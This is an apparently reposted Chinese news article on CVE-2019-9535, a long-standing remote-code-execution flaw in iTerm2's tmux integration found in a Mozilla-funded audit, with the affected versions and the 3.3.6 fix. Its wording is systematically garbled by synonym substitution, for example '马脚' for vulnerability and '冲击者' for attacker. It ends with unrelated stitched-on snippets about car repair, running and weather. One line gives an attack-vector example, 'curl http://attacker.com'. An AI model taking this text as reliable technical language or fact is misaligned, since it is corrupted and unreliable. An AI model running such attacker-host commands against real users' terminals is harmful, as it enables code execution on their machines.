由Mozilla开源撑持规划(MOSS)匡助、收集安然公司Radically Open Security(ROS)开展的一次自力安然审计事实浮现,iTerm 2 中存在一个严重的远程代码执行(RCE)马脚,且至少已存在7年。
[转载出处:www.11jj.com]
iTerm 2 简介
iTerm2是全球最热点的终端模拟器之一,是斥地人员经常使用的MacOS 终端对象,是Mac内置终端app最有力的热点开源对象替代品之一,被多少斥地人员称为“Mac 终端利器”。
MOSS 规划选择iTerm2进行安然审计的原因在于它处理不受信任的数据且其使用局限遍及,用户包括高风险方针如斥地人员和系统治理员。
马脚概述
该马脚的CVE编号是CVE-2019-9535。
在审计过程中,ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重马脚。冲击者如能生成终端输出,则在多少景遇下能够在用户角力机上执行呼吁。这种冲击向量的例子是连结到由冲击者把握的 SSH 处事器或许呼吁如curl http://attacker.com and tail -f /var/log/apache2/referer_log。
斥地人员George Nachman指出,“审计发现某个问题在收到必然的输入后会导致iTerm2发出呼吁。这个问题非常严重,因为在某些景遇下,当用户检察文件或许领受在iTerm2组织的输入时,冲击者就能够在用户机械上执行代码。”
Nachman认为该马脚影响的iTerm2用户数量介于10万至20万之间。
Mozilla公司的安然工程师Tom Ritter指出,这个马脚源自iTerm2中的 tmux集成功能。Tumx应用轨范是一款终端多路复用器,可许可从单个设备竖立并把握多个终端。
CERT协调中心发布马脚通知透露,可经由使用呼吁行对象在终端屏幕上打印由冲击者把握的内容,从而行使该马脚。该中心指出,“潜在的冲击向量包括经由ssh连结至恶意处事器,经由curl 获取恶意网站,或许经由tail –f跟踪包含某些恶意内容的日志文件。”
如下是模拟受害者机械连结到恶意SSH处事器之后,在机械上执行呼吁的 PoC视频。在这个案例中,只打开一个角力器作为此外更具恶意的呼吁的占位符。
一般景遇下,该马脚需要某些用户交互或手法才能遭触发,但因为它可经由常日被认为是安然的呼吁行使,是以它的潜在影响力伟大。
影响版本
该马脚影响于本周早些时候发布的 3.3.5 版本及之前版本。
修复方案
今朝补丁已发布但自动更新尚未推送,建议用户马上在iTerm2目录中选择“搜检新版本”手动更新至最新版本3.3.6。
*参考起原:Mozilla、TheRegister,由代码卫士编译,转载请注明来自FreeBuf.COM
超卓介绍
比来,呼市的高师长因为车出了故障就送到4S店修理,可是这车没修好不说还修出了一肚子气。 2022年1月,高师长在呼市中庆林达林肯中心花
大家好,小乐今天来为大家解答怎么跑步跑得快不累以下问题,跑步怎么跑得快很多人还不知道,现在让我们一起来看看吧!1、想要跑步跑得快,首先
大家好,小丽今天来为大家解答交叉关系举例以下问题,交叉关系举例三个词很多人还不知道,现在让我们一起来看看吧!1、比如,陕西人:专家,
大家好,小乐今天来为大家解答空待以下问题,空待君不回很多人还不知道,现在让我们一起来看看吧!1、《空待》是一首由王朝和天依合作的VOC
研途漫漫,他们披星带月荆棘丛丛,他们甘之如饴保研路上他们用无悔的对峙践行着心中的妄想收获了满径花香本期让我们一路走近保研学子机械设
比来,江南、华南强对流天色频发,3 月 31 日凌晨,江西省南昌市突发强对流天色,最强时段是 3:00 前后,南昌市、南昌县观测到了 9 级大风,进贤
大家好,小伟今天来为大家解答怎么关闭开机自动启动的软件以下问题,怎么关闭开机自动启动软件win7很多人还不知道,现在让我们一起来看看吧!
大家好,小娟今天来为大家解答世界美院排名以下问题,世界美院排名前100很多人还不知道,现在让我们一起来看看吧!1、2023年米兰布雷拉美术学院
Copyright 2024.依依自媒体,让大家了解更多图文资讯!